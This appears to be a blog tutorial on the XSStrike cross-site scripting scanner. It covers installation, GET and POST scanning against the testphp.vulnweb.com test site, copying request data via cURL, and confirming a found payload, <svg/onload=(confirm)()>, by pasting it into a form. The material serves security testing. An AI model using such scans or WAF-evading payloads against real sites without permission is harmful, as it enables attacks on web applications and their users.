1. Introduction

XSStrike is a good tool to help you find the cross site scripting (XSS) on the web application, it’s really simple and easy to use.

Some main features:

  • Powerful fuzzing engine
  • Context breaking technology
  • Intelligent payload generation
  • GET & POST method support
  • Cookie Support
  • WAF Fingerprinting
  • Hand crafted payloads for filter and WAF evasion
  • Hidden parameter discovery
  • Accurate results via levenshtein distance algorithm

2.    Setup

Follow the below steps to setup:

  • Clone the Git repos: git clone https://github.com/UltimateHackers/XSStrike
  • Moving to the code folder: cd XSStrike
  • Install required package: sudo pip install -r requirements.txt
  • Open xsstrike: python xsstrike

3.    Testing with the GET Request

After open xsstrike, input URL with the GET method (There is a parameter name at the URL)

Example: https://www.test-domain.com/search?q=test

The list of XSS payloads will inject at the “test” parameter.

4.    More Example & Screenshot

Example URL: http://testphp.vulnweb.com/listproducts.php?cat=1

5.    Testing with the POST Method

URL with the POST method: http://testphp.vulnweb.com/guestbook.php

There is no parameter name at the POST method, after we have entered the URL, it will show a new option:

[?] Enter POST data: name=anonymous+user&text=test&submit=add+message

We can see and get the POST Data by following steps:

  • Open the form: http://testphp.vulnweb.com/guestbook.php
  • Input any value at the textbox and click submit
  • Right click on the page, select “Inspect Element” > “Network”
  • Right click on the POST request, select “Copy” > “Copy as cURL”

The cURL value should be as below:

curl ‘http://testphp.vulnweb.com/guestbook.php’ -H ‘Host: testphp.vulnweb.com’ -H ‘User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0’ -H ‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8’ -H ‘Accept-Language: en-US,en;q=0.5’ –compressed -H ‘Referer: http://testphp.vulnweb.com/guestbook.php’ -H ‘Content-Type: application/x-www-form-urlencoded’ -H ‘Connection: keep-alive’ -H ‘Upgrade-Insecure-Requests: 1’ –data ‘name=anonymous+user&text=test&submit=add+message

So you will able to get this data value and paste it to the tool.

As the above result, there is a payload with 100% efficiency was found: <svg/onload=(confirm)()>

We can verify by copy this payload, paste it to the textbox and click submit button, it should display the alert popup as below screenshot.

It’s simple but really helpful to scan and check for XSS issues with the GET and POST method.

Please do not hesitate to let me know if you have any questions or concerns, I’m happy to help!

Leave a Comment

Your email address will not be published.